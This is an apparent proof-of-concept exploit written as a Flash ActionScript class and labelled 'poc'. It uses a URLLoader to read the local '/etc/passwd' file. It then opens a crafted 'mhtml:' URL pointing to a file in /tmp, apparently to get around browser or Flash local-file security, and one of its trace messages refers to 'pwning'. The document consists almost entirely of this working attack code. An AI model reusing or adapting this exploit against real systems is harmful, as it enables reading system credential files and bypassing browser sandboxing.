poc
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.*;
import flash.system.Security;
public class URLRequestExample extends Sprite {
private var loader:URLLoader;
public function URLRequestExample() {
loader = new URLLoader();
configureListeners(loader);
var request:URLRequest = new URLRequest("/etc/passwd");
try {
loader.load(request);
} catch (error:Error) {
trace("Unable to load requested document." + error.toString());
}
}
private function configureListeners(dispatcher:IEventDispatcher):void {
dispatcher.addEventListener(Event.COMPLETE, completeHandler);
dispatcher.addEventListener(Event.OPEN, openHandler);
dispatcher.addEventListener(ProgressEvent.PROGRESS, progressHandler);
dispatcher.addEventListener(SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler);
dispatcher.addEventListener(HTTPStatusEvent.HTTP_STATUS, httpStatusHandler);
dispatcher.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHandler);
}
private function completeHandler(event:Event):void {
var loader:URLLoader = URLLoader(event.target);
/*try {
Security.loadPolicyFile("file://tmpfil");
} catch (error:Error) {
trace:("fuck" + error.toString());
}
*/
var request:URLRequest = new URLRequest("mhtml:/././tmp/pippo.html");
try { navigateToURL(request, "_blank");}
catch (e:Error) { trace("Error occurred while pwning" + e.toString());}
trace("completeHandler: " + loader.data);
}
private function openHandler(event:Event):void {
trace("openHandler: " + event);
}
private function progressHandler(event:ProgressEvent):void {
trace("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);
}
private function securityErrorHandler(event:SecurityErrorEvent):void {
trace("securityErrorHandler: " + event);
}
private function httpStatusHandler(event:HTTPStatusEvent):void {
trace("httpStatusHandler: " + event);
}
private function ioErrorHandler(event:IOErrorEvent):void {
trace("ioErrorHandler: " + event);
}
}
}